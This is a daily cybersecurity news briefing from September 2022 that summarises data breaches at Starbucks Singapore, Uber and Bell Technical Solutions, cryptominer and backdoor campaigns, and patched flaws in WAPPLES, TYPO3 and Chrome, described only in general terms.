Cyware Daily Threat Intelligence

Daily Threat Briefing • Sep 16, 2022
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Sep 16, 2022
The value of cryptocurrencies has plummeted in the last few months, but it continues to be a hot target for hacking groups. Kensing malware authors were observed taking advantage of security flaws in the Oracle WebLogic Server to deliver a cryptominer. Its operators have a history of searching for susceptible servers to incorporate them into botnets. In other news, Mandiant analysts suggest that the North Korean government distributed a trojanized version of the PuTTY networking application to backdoor the networks of organizations they wish to spy on, in this case, media companies.
Furthermore, Google Chrome 105 has released new updates to address as many as 11 issues, with more than a half-dozen classified as high-severity bugs. The latest upgrade was rolled out to Mac and Linux users as Chrome 105.0.5195.125.
Starbucks customer data compromised
Starbucks Singapore confirmed that hackers illegally accessed some of its customers' personal data, including names, residential addresses, mobile numbers, and birthdates. The company confirmed that customers’ credit card details and passwords weren’t compromised, though the F&B chain has advised all its customers to change their passwords immediately.
Uber systems breached
Uber disclosed a security incident in which attackers gained access to confidential information, including vulnerability reports, by compromising its internal networks. Hackers used social engineering on an employee's Slack account to get access and procure passwords. They obtained vulnerability disclosure data by infiltrating the company’s HackerOne bug bounty program.
Hive outfit hacks BTS
Hive ransomware group claimed responsibility for attacks on Bell Canada subsidiary Bell Technical Solutions (BTS). The group said that it gained access to the firm’s operational and employee data. The affected information included names, addresses, and phone numbers of residential and small business customers in Ontario and Quebec. However, no critical client information such as credit or debit card numbers, banking information, or other financial information was leaked.
Kinsing drops cryptominers on Oracle servers
Kinsing malware authors were found abusing recently published and older security vulnerabilities in Oracle WebLogic Server to deliver cryptominers. They leveraged the vulnerability, identified as CVE-2020-14882, to drop Python scripts with capabilities to disable OS security features. The bad actor exploits the flaw against unpatched servers to acquire control and dump malicious payloads.
Hackers deploy backdoor on media firms
Mandiant discovered North Korean hackers using infected versions of the PuTTY and KiTTY SSH clients to release a novel backdoor AIRDRY.V2 on media companies. The Operation Dream Job campaign, operational since 2020, is now being continued through a fake Amazon job assessment. According to researchers, the threat cluster responsible is UNC4034, aka Temp.Hermit or Labyrinth Chollima.
Security holes in WAPPLES firewall
Kazakhstan-based security researcher Konstantin Burov uncovered multiple bugs in WAPPLES’ web app firewall. Bugs from version 4.0 to 6.0 allow a remote attacker to execute arbitrary code and access sensitive information via predefined credentials. Furthermore, versions 5.0 and 6.0 of the firewall were also found exposed to privilege escalation flaws. The vulnerabilities are tracked as CVE-2022-24706, CVE-2022-35413, CVE-2022-31322, CVE-2022-31324, and CVE-2022-35582.
Maintainers fix open source CMS flaw
Security researcher David Klein reported a cross-site scripting (XSS) flaw in the open-source CMS TYPO3. The project developers issued a series of software updates for typo3/cms-core versions 7.6.58, 8.7.48, 9.5.37, 10.4.32, and 11.5.16. It is to be noted that all the prior versions on these release lines are impacted by the flaw.
Chrome fixes high-severity vulnerabilities
Google researchers released the Chrome 105 update that patches 11 vulnerabilities, including seven high-severity bugs. The issued CVE identifiers for the flaws are CVE-2022-3195 through CVE-2022-3201. One of the issues was identified in Chrome’s Storage component. Three use-after-free flaws were in the PDF component and the fourth use-after-free vulnerability was located in Frames. The remaining two vulnerabilities were in internals and in DevTools.